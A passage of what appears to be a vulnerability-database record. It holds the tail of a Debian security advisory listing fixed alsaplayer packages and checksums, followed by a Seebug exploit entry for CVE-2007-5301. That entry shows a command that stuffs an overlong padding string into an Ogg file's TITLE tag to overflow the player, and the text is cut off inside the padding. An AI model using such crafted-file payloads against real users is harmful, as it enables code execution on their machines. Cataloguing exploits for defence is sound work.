checksum: 1411 f1cef8ce08af0bc84cc18f45bf54774b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.diff.gz\n Size/MD5 checksum: 179628 f2af0197803ce618482ecdc6c78b420e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27560 e1b68d62513e27add20da78f6820b1f4\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 28082 c66cc4df7b809c81df49de084b462205\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27270 6f75fda99af97920257383affe3c075f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 30272 46817a06719f8becbeb69b9359d4d91a\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 25590 bb7c7149b6757eceb15357472bb4e2b6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 195438 440ce88bb7f9a2d5b2a3e4bc0c35657b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 25420 4bc13bef3dab2646be6750fdd296358d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27608 483288f19e1fe342240162cfa150a02d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 137782 0b52ae9bc30a1314834e7ef5107f3659\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 31896 6f1227ba21196977efc12f41dfb30c0a\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 83198 
edb8f259c9817a975f0d87f99108697f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 28586 1af7443e262e60c7a38380124c2b488b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 26924 a35d711c0e01c370415d59549b8a5f23\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 121774 4e04fcd7739a1905e48ba49fda0a807b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 163868 8bef80d9dc227726d2f2024549265bd9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 25192 7157a8d0c576f791154d85d305d5ee4e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 28990 20a25a4f3fbb7635fc92f4bd3db34123\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27816 3e7b0fd06c61fb07636e9a8ad4223925\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27596 a030d22d8d0a04f5c944e4f1acd95ad0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 26884 4e2f9a0a5570680075d8e723ded3af4d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27050 f1e36292510e1c6800381c1687de72f2\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 31348 e2e95c3d77565abcb77fc3016ac94318\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 82202 
47f4dd3eac22823b20eac1d5ac2a593c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 25118 ddea153c747bbac0286b2fe9708da9b4\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27736 86b887e84550c7288c773fc8a888dfb7\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 26672 1dc88ad32d415f5a2c6624b69e7998ca\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27216 736ce1ccaafae5f9e3625dbdf8b5899d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 120772 4aefd3462f4256965914286c1a7061e8\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 83954 48d8e598299a15b90b61a920e141ed85\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 26752 f9de177fea822cbf3080d4edacc74db6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 28656 05d55679345622f1a87ff2f1cca7e5bd\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27358 dfa10d528760e3e9de65c20ea9d9dae6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 25152 b1c6124426d3193df76eaf30d434c8bb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 173496 76c2bfe4990607494b9e6d39de7c394c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 25004 f9298a89ec2e3cf70f255d6a0dedd22b\n 
http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 29410 45c2839bd4b65d5fbc6ad6fda9761f96\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 30830 d32c6b62cc1d4a50af1b2f340c60e295\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27870 46dff50cec7b6122ad8f056e42e07bf0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 28772 2aa591d9ebe3f8e5a7996a31fae9f093\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27926 604e9ddc8a8e48031934c1d8ff44278f\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 31560 956ddd8afc906f9c1ef658348d3eedf0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 25962 3ebcd9cc144bb8386a1ca0f9a410985d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 29106 71dcd89706a5d8862d20228f3a65d9d1\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 139484 ed32063973b85fb4b22d7dc0fe5f1eba\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27858 84a05b131e76039bb03b854428cd6ed9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 191314 094ec3d9963ff0641a5748e51da11592\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 25812 5e7339d56deb8c88cd83f83895a716c5\n 
http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 85944 8c484572699fd8e8ae9e437c8c8f0777\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 30404 152b14037ca04c15f98d61da207d8d46\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 28100 f1ef493cd0e41107102a7d552b83563c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26938 9fd4b50433e0e8059e841156d89265c8\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 81112 63d46351fcfaf549e0602289d9fd7139\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 25102 2b54d8b1f00a371d22b59d83e5cde354\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 115288 902924f6ef4f2e63b66b183dc0c35334\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26996 9d0e04a29f76e31f8b076ab3a689a23f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26732 a4c34cf4a0ab302a9ec079830bc078a5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 28900 9153f6bcfa7b63b15a48f28a599bbc72\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 158866 c35adec287030905bf0db4e27ab81d63\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 27682 122a2eaf526f4566d7a7486900bf31b3\n 
http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 24994 1a43a121d1a49ca6873ba5095d859e62\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 26008 b582458d4fd4c5a0b38bab8b2f0459b9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 29332 5f4ccdc8009a1370188025e7efba87eb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28878 dc628fa779e8485c9c3dab8363d5726c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 29486 3035fc70c59b1d1edd17725987f19bad\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 26340 6db7a892db68580708265873f6ce52b2\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 32072 20a46904c43bb27f793bcbbd38079156\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28608 467d81086aa8141c67490d0c7b92f9e4\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 81542 5d309e66d4abe81b83e1e086575d10f5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 239982 8c1cf0558be5c8735b41160db61be0d3\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 33344 6b6c4685c617583e6a7e2619bc3be82c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28184 2fe8caf134eb15304354c3796e453a35\n 
http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 164272 48f8eb0310511c326642264a8a3cb63d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 165842 b16d5d2344a40bc23ab0e03094669839\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27652 0a22b61200a7a29553c8ee85dd6a4f07\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27092 f0afc829883f7f794b7d1675746f7d58\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 28030 c9ae0b3f54a88a4e11cded00fccba67c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 25222 a9c8b5bfdafd442d5b286814c2ce680d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 25072 07b4f0bf800449ab08c8015650c72776\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 26806 16b2d718d3acf15eb383bfd920c10480\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27066 3314a50149ea5dceae3e5467e76c77a0\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 85636 fefda097b64dab1279376fe0f0b35fdb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 117694 f05708f5ce8cea7bc95e65a54e29f687\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 29316 02487afba03040ba13ba21c01025b16e\n 
http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 29670 c4ddd404db7fd3bdc1ef9a123924418e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 25148 dabdc1d59a6ae032838dea3353102093\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27016 519022c9eb3b6c96a3afa44381f64366\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 28224 fbe850b98a06e6b96c7a7bbd733c22f0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27230 7ac0f034f092d2b16857a796def98e2b\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 29932 f2da5578e585c2933e8fef32c724aa99\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 79724 50953a15fe437b4a1a19fa55e2c4bde1\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 166054 9b6e96349f4bdd877a8a91b922ee20dc\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27272 bce2fdec07e84698e63b28317ecf2de6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 25320 edf3f4f18c7692d0aba2406c9023f322\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 29578 cce9ee89957dcfa6b0f59563d782f3f0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27820 
073b5d172915d9a5e57b6732b88be36e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 117138 f00516877e9bba7f95bd28daa2ec3735\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28758 435a5cd0d7a2154f7de5795c0c639a34\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 78298 3366d969c599537dbfbd71cfae4e8913\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 29788 ed8a38ed1e7f6dc67fd26ed75f1eeded\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28890 18b6b83140d2cfa47cfacbf26d254fd6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 26942 f899716736bbf2a23d3e165f9b0f1bc9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 29490 fd8f760c694e23c51f984c136f0271b3\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 31720 11b35992acfa3cde29d8edf00c0afb1d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 31352 0ac9167acdf80a7b80aac9323981f720\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28974 12bca0fb5a143e69788d19516de3c9a2\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 27172 baeeb5593985237037a4ec5dcd6fc063\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 
182962 11f96fe3adf8fe0facfebb59a0abc423\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 130974 b60fc57e8681ecb09e67001c26650df9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27974 d96577d4acff264dee6487bbedf0a970\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27448 936a4b1de8dc976891f6eb04197fbc92\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 28130 1a37d675e87df59e60823d86bb3b079a\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 25306 1ec0e9272b6b77231ba4236f3ef5b0c5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27160 ff4273b1f78919238579ebcbbc361c2d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 164762 7dc9d8881ce9779e211de5b0f10bfb24\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 79096 7d8be3542791df96a6df738b134fa60e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 123358 69ffb56b564c13ef1735fa4d5bf45725\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 29786 1707fbd54e4782fc1c4a756c9b3b1be8\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27404 df369a2d65ceca9281b6e9f42eb13080\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 25458 
f7148876d165801bddea3f8370d77cff\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 31298 799599d2ee4ba08d0024f1ae14bf2b71\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 77596 b082cb4dc6228cd4dd604b6080d80fc0\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 29638 7ca739cc15f4328730f588707267c973\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26900 177580129b807bd9fe97f82c7752039b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 118620 63df839b875a82977feac0bb6800fb23\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26862 ccae6c55156046f553c8aa4f0baa4232\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26764 6481a032bf418dd73f7da67f0874def0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 29272 36d7b51e3f48189ada1ff54ccb59a5d0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 27716 76976b49916283774b2a5e3200048ccc\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 156806 a0c4129dc4d8b94b8baf9a56ead2edf4\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 25040 f7c83edbd6586a0feca68de38fab2817\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 25132 
70717e12ed7d77e82f3a02ad8802c513\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 27858 13cbdbec99958a329403b805d1ba98b3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-04-04T20:27:27", "published": "2008-04-04T20:27:27", "id": "DEBIAN:DSA-1538-1:32D1F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00108.html", "title": "[SECURITY] [DSA 1538-1] New alsaplayer packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T21:49:04", "description": "No description provided by source.", "published": "2008-04-11T00:00:00", "title": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-8307", "id": "SSV:8307", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print 
"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAA